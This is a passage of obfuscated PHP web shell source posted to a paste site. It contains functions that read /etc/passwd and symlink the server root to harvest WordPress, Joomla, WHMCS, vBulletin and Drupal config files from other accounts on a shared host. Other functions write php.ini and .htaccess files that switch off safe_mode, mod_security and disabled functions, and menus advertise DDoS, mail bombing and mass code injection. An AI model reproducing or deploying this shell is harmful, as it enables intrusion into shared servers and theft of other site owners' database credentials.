  228. </form></center><br /><br />";}echo"</div>";printFooter();}function actionReadable(){printHeader();echo"<h1>Readable Dirs</h1>";$hxioinogfpkf="sm";echo"<div class="content">";${${"GLOBALS"}["dekgovck"]}=ini_get("safe_mode");if(${$hxioinogfpkf}){echo"<br /><b>Error: safe_mode = on</b><br /><br />";}else{${"GLOBALS"}["djpuegw"]="passwd";${"GLOBALS"}["pwlmhi"]="passwd";@${${"GLOBALS"}["pwlmhi"]}=fopen("/etc/passwd","r");if(!${${"GLOBALS"}["djpuegw"]}){echo"<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />";}else{${"GLOBALS"}["tzdehv"]="users";${"GLOBALS"}["fkoujjqljwtv"]="i";${${"GLOBALS"}["ofemchnylx"]}=array();${${"GLOBALS"}["tzdehv"]}=array();${${"GLOBALS"}["qtpmkxxs"]}=array();${"GLOBALS"}["jkrntckoqx"]="users";${"GLOBALS"}["tukuxolotl"]="passwd";${${"GLOBALS"}["fkoujjqljwtv"]}=0;while(!feof(${${"GLOBALS"}["tukuxolotl"]})){$uwcfvcvfvvdw="i";${"GLOBALS"}["onhbdqvqgc"]="passwd";${${"GLOBALS"}["knqwqdn"]}=fgets(${${"GLOBALS"}["onhbdqvqgc"]});if(${${"GLOBALS"}["rcrtozri"]}>35){${"GLOBALS"}["meofplhys"]="username";${"GLOBALS"}["egceismih"]="pos";$kailpsipg="username";${${"GLOBALS"}["egceismih"]}=strpos(${${"GLOBALS"}["knqwqdn"]},":");${${"GLOBALS"}["dmdvnsdri"]}=substr(${${"GLOBALS"}["knqwqdn"]},0,${${"GLOBALS"}["cytwbtmsifil"]});${${"GLOBALS"}["htvreepkteq"]}="/home/".${$kailpsipg}."/public_html/";if((${${"GLOBALS"}["meofplhys"]}!="")){if(is_readable(${${"GLOBALS"}["htvreepkteq"]})){$lvujocgqmhz="dirz";array_push(${${"GLOBALS"}["ksfcsux"]},${${"GLOBALS"}["dmdvnsdri"]});array_push(${${"GLOBALS"}["ofemchnylx"]},${$lvujocgqmhz});}}}${$uwcfvcvfvvdw}++;}echo"<br><br>";echo"[+] Founded ".sizeof(${${"GLOBALS"}["ksfcsux"]})." entrys in /etc/passwd"."<br />";$qgepquvu="user";echo"[+] Founded ".sizeof(${${"GLOBALS"}["ofemchnylx"]})." readable public_html directories"."<br /><br /><br />";foreach(${${"GLOBALS"}["jkrntckoqx"]} as${$qgepquvu}){$cifisivnfmx="path";${$cifisivnfmx}="/home/$user/public_html/";echo${${"GLOBALS"}["ohukdtuyelta"]}."<br>";}echo"<br /><br /><br />[+] Complete..."."<br />";}}echo"</div>";printFooter();}function actionSymlink(){printHeader();${"GLOBALS"}["qwdiflmpx"]="furl";$gouvvwcw="furl";echo"<h1>Symlink</h1>";${"GLOBALS"}["tmcsarix"]="furl";${"GLOBALS"}["pqnqgjlwfbbh"]="expld";${${"GLOBALS"}["tmcsarix"]}="http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];${${"GLOBALS"}["pqnqgjlwfbbh"]}=explode("/",${${"GLOBALS"}["qwdiflmpx"]});${${"GLOBALS"}["tuxlvcs"]}=str_replace(end(${${"GLOBALS"}["rlezpjvpmdc"]}),"",${$gouvvwcw});echo"<div class=\"content"><center>
  229. <h3>[ <a href=\"#" onclick=\"g('symlink',null,'website',null)">Domains</a> ] -
  230. [ <a href=\"#" onclick="g('symlink',null,'whole',null)\">Whole Server Symlink</a> ] -
  231. [ <a href="#" onclick="g('symlink',null,'config',null)">Config files symlink</a> ]</h3></center>";if(isset($_POST["p1"])&&$_POST["p1"]=="website"){${"GLOBALS"}["zmmldhyup"]="d0mains";echo"<center>";${${"GLOBALS"}["zmmldhyup"]}=@file("/etc/named.conf");if(!${${"GLOBALS"}["jvpnlp"]}){echo"<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";}else{$jmallocp="d0main";${"GLOBALS"}["jnvhkbmo"]="unk";echo"<table align=center class='main' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";${${"GLOBALS"}["uptmndscp"]}=array();foreach(${${"GLOBALS"}["jvpnlp"]} as${$jmallocp}){$junumxp="d0main";if(@eregi("zone",${$junumxp})){preg_match_all("#zone "(.*)\"#",${${"GLOBALS"}["pelfiuzp"]},${${"GLOBALS"}["apyjin"]});flush();if(strlen(trim(${${"GLOBALS"}["apyjin"]}[1][0]))>2){$wcoknhobri="domains";${${"GLOBALS"}["uptmndscp"]}[]=${$wcoknhobri}[1][0];flush();}}}${${"GLOBALS"}["urpgrdnda"]}=1;${${"GLOBALS"}["uptmndscp"]}=array_unique(${${"GLOBALS"}["jnvhkbmo"]});$zwtxrfhxx="d";${"GLOBALS"}["wstpgrxbvfi"]="unk";${${"GLOBALS"}["muwqirblho"]}=0;foreach(${${"GLOBALS"}["wstpgrxbvfi"]} as${$zwtxrfhxx}){${"GLOBALS"}["ulosdgoirib"]="user";${"GLOBALS"}["bfrjcdcx"]="count";${"GLOBALS"}["iaqkpusujdb"]="l";${"GLOBALS"}["ecpfhmtpho"]="d";${${"GLOBALS"}["sdpydmesch"]}=posix_getpwuid(@fileowner("/etc/valiases/".${${"GLOBALS"}["ecpfhmtpho"]}));echo"<tr".(${${"GLOBALS"}["muwqirblho"]}?" class=l1":"")."><td>".${${"GLOBALS"}["urpgrdnda"]}."</td><td><a href=http://".${${"GLOBALS"}["kdlkocrcdp"]}."/>".${${"GLOBALS"}["kdlkocrcdp"]}."</a></td><td>".${${"GLOBALS"}["ulosdgoirib"]}["name"]."</td></tr>";flush();${${"GLOBALS"}["bfrjcdcx"]}++;${${"GLOBALS"}["iaqkpusujdb"]}=${${"GLOBALS"}["muwqirblho"]}?0:1;}echo"</table>";}echo"</center>";}if(isset($_POST["p1"])&&$_POST["p1"]=="whole"){$bplqahth="hdt";echo"<center>";${"GLOBALS"}["qgpipxb"]="hfp";@mkdir("sym",0777);$bipqlyde="hdt";${$bplqahth}="Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any";${${"GLOBALS"}["qgpipxb"]}=@fopen("sym/.htaccess","w");fwrite(${${"GLOBALS"}["odhvpydk"]},${$bipqlyde});if(function_exists("symlink")){@symlink("/","sym/root");}${${"GLOBALS"}["jvpnlp"]}=@file("/etc/named.conf");if(!${${"GLOBALS"}["jvpnlp"]}){echo"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";}else{${"GLOBALS"}["xhryempuq"]="d";echo"<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";${${"GLOBALS"}["urpgrdnda"]}=1;${${"GLOBALS"}["mxbbodcwhf"]}=array();${"GLOBALS"}["egnzmk"]="mck";foreach(${${"GLOBALS"}["jvpnlp"]} as${${"GLOBALS"}["pelfiuzp"]}){${"GLOBALS"}["svxkpeytru"]="d0main";if(@eregi("zone",${${"GLOBALS"}["svxkpeytru"]})){preg_match_all("#zone \"(.*)"#",${${"GLOBALS"}["pelfiuzp"]},${${"GLOBALS"}["wbakgcf"]});flush();if(strlen(trim(${${"GLOBALS"}["wbakgcf"]}[1][0]))>2){$dyywiqjeajw="domain";${${"GLOBALS"}["mxbbodcwhf"]}[]=${$dyywiqjeajw}[1][0];}}}${${"GLOBALS"}["mxbbodcwhf"]}=array_unique(${${"GLOBALS"}["egnzmk"]});${${"GLOBALS"}["muwqirblho"]}=0;foreach(${${"GLOBALS"}["mxbbodcwhf"]} as${${"GLOBALS"}["xhryempuq"]}){$wzhmktbvj="d";$bfynmqxxnls="d";$sxyoowbut="l";$jffxhvve="ddt";${"GLOBALS"}["yaubmucz"]="d";${${"GLOBALS"}["sdpydmesch"]}=posix_getpwuid(@fileowner("/etc/valiases/".${${"GLOBALS"}["yaubmucz"]}));${${"GLOBALS"}["txqtpuwu"]}=${${"GLOBALS"}["sdpydmesch"]}["name"];$xejijtxrmbk="l";${${"GLOBALS"}["txqtpuwu"]}=${$wzhmktbvj};${"GLOBALS"}["brcvrmrt"]="l";if(@eregi("\.ir",${${"GLOBALS"}["kdlkocrcdp"]})or@eregi("\.il",${$bfynmqxxnls})){${${"GLOBALS"}["txqtpuwu"]}="<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".${${"GLOBALS"}["kdlkocrcdp"]}."</div>";}echo"<tr".(${${"GLOBALS"}["brcvrmrt"]}?" class=l1":"")."><td>".${${"GLOBALS"}["urpgrdnda"]}++."</td><td><a target='_blank' href=http://".${${"GLOBALS"}["kdlkocrcdp"]}."/>".${$jffxhvve}." </a></td><td>".${${"GLOBALS"}["sdpydmesch"]}["name"]."</td><td><a href='sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."/public_html' target='_blank'>symlink </a></td></tr>";flush();${$xejijtxrmbk}=${$sxyoowbut}?0:1;}echo"</table>";}echo"</center>";}if(isset($_POST["p1"])&&$_POST["p1"]=="config"){$tlsxpel="d0mains";echo"<center>";@mkdir("sym",0777);${${"GLOBALS"}["xyvpqj"]}="Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any";${${"GLOBALS"}["odhvpydk"]}=@fopen("sym/.htaccess","w");@fwrite(${${"GLOBALS"}["odhvpydk"]},${${"GLOBALS"}["xyvpqj"]});if(function_exists("symlink")){@symlink("/","sym/root");}${${"GLOBALS"}["jvpnlp"]}=@file("/etc/named.conf");if(!${$tlsxpel}){echo"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";}else{$ivitqmvrpe="d0main";$wcmtuxujvs="d0mains";${"GLOBALS"}["thkxlgewkwt"]="count";echo"<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";${${"GLOBALS"}["thkxlgewkwt"]}=1;${${"GLOBALS"}["muwqirblho"]}=0;foreach(${$wcmtuxujvs} as${$ivitqmvrpe}){$hsjtpmgbl="d0main";if(@eregi("zone",${$hsjtpmgbl})){$fgqflst="domain";preg_match_all("#zone "(.*)"#",${${"GLOBALS"}["pelfiuzp"]},${$fgqflst});flush();if(strlen(trim(${${"GLOBALS"}["wbakgcf"]}[1][0]))>2){$trpochci="c2";${"GLOBALS"}["jvaimuqg"]="user";$fhuqyfdjw="c8";${"GLOBALS"}["uozqscfgyer"]="ch02";${"GLOBALS"}["hkbxgjyh"]="cf15";${"GLOBALS"}["ukellqnfdxyi"]="user";$eytqivxx="burl";${"GLOBALS"}["dcmcpfhkn"]="ch02";${"GLOBALS"}["pgibrcmz"]="ch14";${"GLOBALS"}["hblykorxtvm"]="ch10";${"GLOBALS"}["crpkgmjxcv"]="cf14";$pmdehsyllr="user";${"GLOBALS"}["snvakpqxrh"]="ch11";${"GLOBALS"}["tugwcsh"]="burl";$luooynhbhbb="domain";${$pmdehsyllr}=posix_getpwuid(@fileowner("/etc/valiases/".${$luooynhbhbb}[1][0]));$wwppfgrtyez="cf13";${"GLOBALS"}["zcilvo"]="ch12";${"GLOBALS"}["cedfwrb"]="user";$nbleegndqyll="ch01";${"GLOBALS"}["fkdpitswptx"]="cf05";$noyiifc="user";$gfiqhdo="user";$rirssxvp="c1";${"GLOBALS"}["djsvhkwxqdi"]="cf13";$igygyggt="ch07";$ylbhvx="cf10";$fnykefa="user";${"GLOBALS"}["ksoanablmhh"]="cf01";$hxnqterv="count";${"GLOBALS"}["miavkxjvlu"]="burl";${"GLOBALS"}["ktrlxxens"]="cf02";$wwhjvz="ch04";${${"GLOBALS"}["sjwnuvys"]}=${${"GLOBALS"}["tugwcsh"]}."/sym/root/home/".${$noyiifc}["name"]."/public_html/wp-config.php";$klantdxnj="ch06";$lcchxqfqks="cf02";${"GLOBALS"}["oocqylcwob"]="burl";$edksmganwu="ch01";${"GLOBALS"}["wpkivjcupmg"]="cf08";$slktoxmp="ch05";${"GLOBALS"}["uqhjahg"]="c12";${"GLOBALS"}["vraiwki"]="burl";${$nbleegndqyll}=get_headers(${$rirssxvp});${"GLOBALS"}["tabouzvdcig"]="cf06";${${"GLOBALS"}["ksoanablmhh"]}=${$edksmganwu}[0];${${"GLOBALS"}["dejbygpc"]}=${${"GLOBALS"}["tuxlvcs"]}."/sym/root/home/".${${"GLOBALS"}["ukellqnfdxyi"]}["name"]."/public_html/blog/wp-config.php";${"GLOBALS"}["lgqtumc"]="c5";${${"GLOBALS"}["uozqscfgyer"]}=get_headers(${$trpochci});${$lcchxqfqks}=${${"GLOBALS"}["dcmcpfhkn"]}[0];${${"GLOBALS"}["kzgfuivbq"]}=${${"GLOBALS"}["oocqylcwob"]}."/sym/root/home/".${$gfiqhdo}["name"]."/public_html/configuration.php";$owcpfiexl="c15";${${"GLOBALS"}["curnjtdg"]}=get_headers(${${"GLOBALS"}["kzgfuivbq"]});$djbobtjnvpk="c10";${"GLOBALS"}["kiuwuwyf"]="c4";${"GLOBALS"}["cmhprhursj"]="burl";${"GLOBALS"}["cdxjpdsue"]="c11";${${"GLOBALS"}["dwdsmzze"]}=${${"GLOBALS"}["curnjtdg"]}[0];$gvrobo="burl";$xsompwklbh="ch04";$uipgqqktjp="cf10";${${"GLOBALS"}["nuxnihbyr"]}=${${"GLOBALS"}["tuxlvcs"]}."/sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."/public_html/joomla/configuration.php";${$xsompwklbh}=get_headers(${${"GLOBALS"}["kiuwuwyf"]});${${"GLOBALS"}["vfnfmdm"]}=${$wwhjvz}[0];${${"GLOBALS"}["lgqtumc"]}=${${"GLOBALS"}["cmhprhursj"]}."/sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."/public_html/includes/config.php";${${"GLOBALS"}["jplodscbxohk"]}=get_headers(${${"GLOBALS"}["andpbxkk"]});$eebjugg="cf07";${"GLOBALS"}["mddkimmlswv"]="c13";${${"GLOBALS"}["komyeesyg"]}=${$slktoxmp}[0];${${"GLOBALS"}["wdhyaqetqa"]}=${$gvrobo}."/sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."/public_html/vb/includes/config.php";$vxzyxwyvbnw="burl";${${"GLOBALS"}["vwwjwfjm"]}=get_headers(${${"GLOBALS"}["wdhyaqetqa"]});${${"GLOBALS"}["tabouzvdcig"]}=${$klantdxnj}[0];$mnexqghjwul="domain";${"GLOBALS"}["bcraemepr"]="ch09";${${"GLOBALS"}["smmeycn"]}=${${"GLOBALS"}["tuxlvcs"]}."/sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."/public_html/forum/includes/config.php";$hpjkhwin="cf06";${${"GLOBALS"}["osoffgwmjltx"]}=get_headers(${${"GLOBALS"}["smmeycn"]});${"GLOBALS"}["ymjeoqwpyyr"]="c9";${$eebjugg}=${$igygyggt}[0];${${"GLOBALS"}["wacdfrvwe"]}=${$eytqivxx}."/sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."public_html/clients/configuration.php";${${"GLOBALS"}["kpjbcmarfuo"]}=get_headers(${$fhuqyfdjw});${"GLOBALS"}["qfqiqntpde"]="ch09";$jnbnemuwvq="c15";${${"GLOBALS"}["rerpayj"]}=${${"GLOBALS"}["kpjbcmarfuo"]}[0];${${"GLOBALS"}["ymjeoqwpyyr"]}=${$vxzyxwyvbnw}."/sym/root/home/".${$fnykefa}["name"]."/public_html/support/configuration.php";$rblmbzmoj="cf01";${"GLOBALS"}["qvkymqrcons"]="cf12";${"GLOBALS"}["cdokfsqgsa"]="burl";${${"GLOBALS"}["bcraemepr"]}=get_headers(${${"GLOBALS"}["ithzxlxrmlm"]});$zbmzmaskns="burl";${${"GLOBALS"}["vsfdkofjj"]}=${${"GLOBALS"}["qfqiqntpde"]}[0];${$djbobtjnvpk}=${${"GLOBALS"}["vraiwki"]}."/sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."/public_html/client/configuration.php";${${"GLOBALS"}["hblykorxtvm"]}=get_headers(${${"GLOBALS"}["pwtyteeb"]});${$ylbhvx}=${${"GLOBALS"}["dkpunhessln"]}[0];${${"GLOBALS"}["lbmmyubqyr"]}=${${"GLOBALS"}["tuxlvcs"]}."/sym/root/home/".${${"GLOBALS"}["jvaimuqg"]}["name"]."/public_html/submitticket.php";${${"GLOBALS"}["snvakpqxrh"]}=get_headers(${${"GLOBALS"}["cdxjpdsue"]});${${"GLOBALS"}["qhlejcv"]}=${${"GLOBALS"}["cqypnwcvejv"]}[0];${${"GLOBALS"}["uqhjahg"]}=${${"GLOBALS"}["miavkxjvlu"]}."/sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."/public_html/client/configuration.php";${${"GLOBALS"}["zcilvo"]}=get_headers(${${"GLOBALS"}["cnqaxcrxjq"]});${${"GLOBALS"}["scqezcpcbs"]}=${${"GLOBALS"}["prqoprzqir"]}[0];${${"GLOBALS"}["mddkimmlswv"]}=${$zbmzmaskns}."/sym/root/home/".${${"GLOBALS"}["cedfwrb"]}["name"]."/public_html/includes/configure.php";${${"GLOBALS"}["gmnhmktamua"]}=get_headers(${${"GLOBALS"}["ayzcdduspxm"]});${${"GLOBALS"}["djsvhkwxqdi"]}=${${"GLOBALS"}["gmnhmktamua"]}[0];${${"GLOBALS"}["pvfugjjup"]}=${${"GLOBALS"}["cdokfsqgsa"]}."/sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."/public_html/include/app_config.php";${${"GLOBALS"}["mkinpjzdgj"]}=get_headers(${${"GLOBALS"}["pvfugjjup"]});${${"GLOBALS"}["crpkgmjxcv"]}=${${"GLOBALS"}["pgibrcmz"]}[0];${$owcpfiexl}=${${"GLOBALS"}["tuxlvcs"]}."/sym/root/home/".${${"GLOBALS"}["sdpydmesch"]}["name"]."/public_html/sites/default/settings.php";${${"GLOBALS"}["lzohgiefu"]}=get_headers(${$jnbnemuwvq});${${"GLOBALS"}["mwggguhfupqm"]}=${${"GLOBALS"}["lzohgiefu"]}[0];$fnnnlynvq="cf04";${${"GLOBALS"}["ttiqfflposoq"]}="&nbsp;";if(strpos(${$rblmbzmoj},"200")==true){$otgxinwb="c1";${${"GLOBALS"}["ttiqfflposoq"]}="<a href='".${$otgxinwb}."' target='_blank'>Wordpress</a>";}elseif(strpos(${${"GLOBALS"}["ktrlxxens"]},"200")==true){$ozmmrrop="out";${$ozmmrrop}="<a href='".${${"GLOBALS"}["dejbygpc"]}."' target='_blank'>Wordpress</a>";}elseif(strpos(${${"GLOBALS"}["dwdsmzze"]},"200")==true&&strpos(${${"GLOBALS"}["qhlejcv"]},"200")==true){${"GLOBALS"}["gdyjurq"]="out";${${"GLOBALS"}["gdyjurq"]}=" <a href='".${${"GLOBALS"}["lbmmyubqyr"]}."' target='_blank'>WHMCS</a>";}elseif(strpos(${${"GLOBALS"}["vsfdkofjj"]},"200")==true){$lwyhhtrdd="out";${$lwyhhtrdd}=" <a href='".${${"GLOBALS"}["ithzxlxrmlm"]}."' target='_blank'>WHMCS</a>";}elseif(strpos(${$uipgqqktjp},"200")==true){${"GLOBALS"}["kbwdvrjgregv"]="out";${${"GLOBALS"}["kbwdvrjgregv"]}=" <a href='".${${"GLOBALS"}["pwtyteeb"]}."' target='_blank'>WHMCS</a>";}elseif(strpos(${${"GLOBALS"}["dwdsmzze"]},"200")==true){$bxrghdqqf="out";${"GLOBALS"}["wgosqvknd"]="c3";${$bxrghdqqf}=" <a href='".${${"GLOBALS"}["wgosqvknd"]}."' target='_blank'>Joomla</a>";}elseif(strpos(${$fnnnlynvq},"200")==true){${${"GLOBALS"}["ttiqfflposoq"]}=" <a href='".${${"GLOBALS"}["nuxnihbyr"]}."' target='_blank'>Joomla</a>";}elseif(strpos(${${"GLOBALS"}["fkdpitswptx"]},"200")==true){$eycboxd="c5";${${"GLOBALS"}["ttiqfflposoq"]}=" <a href='".${$eycboxd}."' target='_blank'>vBulletin</a>";}elseif(strpos(${$hpjkhwin},"200")==true){${${"GLOBALS"}["ttiqfflposoq"]}=" <a href='".${${"GLOBALS"}["wdhyaqetqa"]}."' target='_blank'>vBulletin</a>";}elseif(strpos(${${"GLOBALS"}["rvszrxig"]},"200")==true){$iuqlwktll="c7";${${"GLOBALS"}["ttiqfflposoq"]}=" <a href='".${$iuqlwktll}."' target='_blank'>vBulletin</a>";}elseif(strpos(${${"GLOBALS"}["wpkivjcupmg"]},"200")==true){$rjjhwqcs="out";${$rjjhwqcs}=" <a href='".${${"GLOBALS"}["smmeycn"]}."' target='_blank'>Client Area</a>";}elseif(strpos(${${"GLOBALS"}["qvkymqrcons"]},"200")==true){${${"GLOBALS"}["ttiqfflposoq"]}=" <a href='".${${"GLOBALS"}["smmeycn"]}."' target='_blank'>Client Area</a>";}elseif(strpos(${$wwppfgrtyez},"200")==true){${"GLOBALS"}["trtkggxbxch"]="c7";${${"GLOBALS"}["ttiqfflposoq"]}=" <a href='".${${"GLOBALS"}["trtkggxbxch"]}."' target='_blank'>osCommerce/Zen Cart</a>";}elseif(strpos(${${"GLOBALS"}["tgqrrkgpda"]},"200")==true){${${"GLOBALS"}["ttiqfflposoq"]}=" <a href='".${${"GLOBALS"}["smmeycn"]}."' target='_blank'>Magento</a>";}elseif(strpos(${${"GLOBALS"}["hkbxgjyh"]},"200")==true){$cqhbmcg="out";${$cqhbmcg}=" <a href='".${${"GLOBALS"}["smmeycn"]}."' target='_blank'>Drupal</a>";}else{continue;}echo"<tr".(${${"GLOBALS"}["muwqirblho"]}?" class=l1":"")."><td>".${$hxnqterv}++."</td><td><a href=http://www.".${$mnexqghjwul}[1][0]."/>".${${"GLOBALS"}["wbakgcf"]}[1][0]."</a></td><td>".${${"GLOBALS"}["sdpydmesch"]}["name"]."</td><td>".${${"GLOBALS"}["ttiqfflposoq"]}."</td></tr>";flush();${${"GLOBALS"}["muwqirblho"]}=${${"GLOBALS"}["muwqirblho"]}?0:1;}}}echo"</table>";}echo"</center>";}echo"</div>";printFooter();}function actionBypass(){printHeader();echo"<h1>Safe Mode</h1>";echo"<div class=\"content">";echo"<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS["cwd"]." |<br><br />";echo"<a href=# onclick=\"g(null,null,'php.ini',null)\">| PHP.INI | </a><a href=# onclick="g(null,null,null,'ini')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,'sh')\">| .htaccess(perl) | </a></center>";if(!empty($_POST["p2"])&&isset($_POST["p2"])){${${"GLOBALS"}["rzmlvlno"]}=fopen($GLOBALS["cwd"].".htaccess","w");fwrite(${${"GLOBALS"}["rzmlvlno"]},"<IfModule mod_security.c>
  232. Sec------Engine Off
  233. Sec------ScanPOST Off
  234. </IfModule>");fclose(${${"GLOBALS"}["rzmlvlno"]});}if(!empty($_POST["p1"])&&isset($_POST["p1"])){$trfcef="fil";$oqmtdspvdc="fil";${$oqmtdspvdc}=fopen($GLOBALS["cwd"]."php.ini","w");fwrite(${${"GLOBALS"}["rzmlvlno"]},"safe_mode=OFF
  235. disable_functions=NONE");fclose(${$trfcef});}if(!empty($_POST["p3"])&&isset($_POST["p3"])){${"GLOBALS"}["nbiukouct"]="fil";${${"GLOBALS"}["nbiukouct"]}=fopen($GLOBALS["cwd"].".htaccess","w");fwrite(${${"GLOBALS"}["rzmlvlno"]},"Options FollowSymLinks MultiViews Indexes ExecCGI
  236. AddType application/x-httpd-cgi .sh
  237. AddHandler cgi-script .pl
  238. AddHandler cgi-script .pl");fclose(${${"GLOBALS"}["rzmlvlno"]});}echo"<br><br /><br /></div>";echo"</div>";printFooter();}function actionDdos(){printHeader();echo"<h1>DDoS</h1>";echo"<div class="content\">";echo"<div class=header><center><h3><span>Premium Features!!!</span></h3>Will come in next version.<br><br />";echo"<br><br /><br /></div>";echo"</div>";printFooter();}function actionMail(){printHeader();echo"<h1>Mass Mailer and Mail Bomber</h1>";echo"<div class=\"content">";echo"<div class=header><center><h3><span>Premium Features!!!</span></h3>Will come in next version.<br><br />";echo"<br><br /><br /></div>";echo"</div>";printFooter();}function actionInjector(){printHeader();echo"<h1>Mass Code Injector</h1>";echo"<div class=\"content">";echo"<div class=header><center><h3><span>Premium Features!!!</span></h3>Will come in next version.<br><br />";echo"<br><br /><br /></div>";echo"</div>";printFooter();}if(empty($_POST["a"])){$qfhhefzdlnl="default_action";$bxlksggeu="default_action";if(isset(${$qfhhefzdlnl})&&function_exists("action".${${"GLOBALS"}["vmeqwtq"]}))$_POST["a"]=${$bxlksggeu};else$_POST["a"]="SecInfo";}if(!empty($_POST["a"])&&function_exists("action".$_POST["a"]))call_user_func("action".$_POST["a"]);
  239. ?>
Add Comment
Please, Sign In to add comment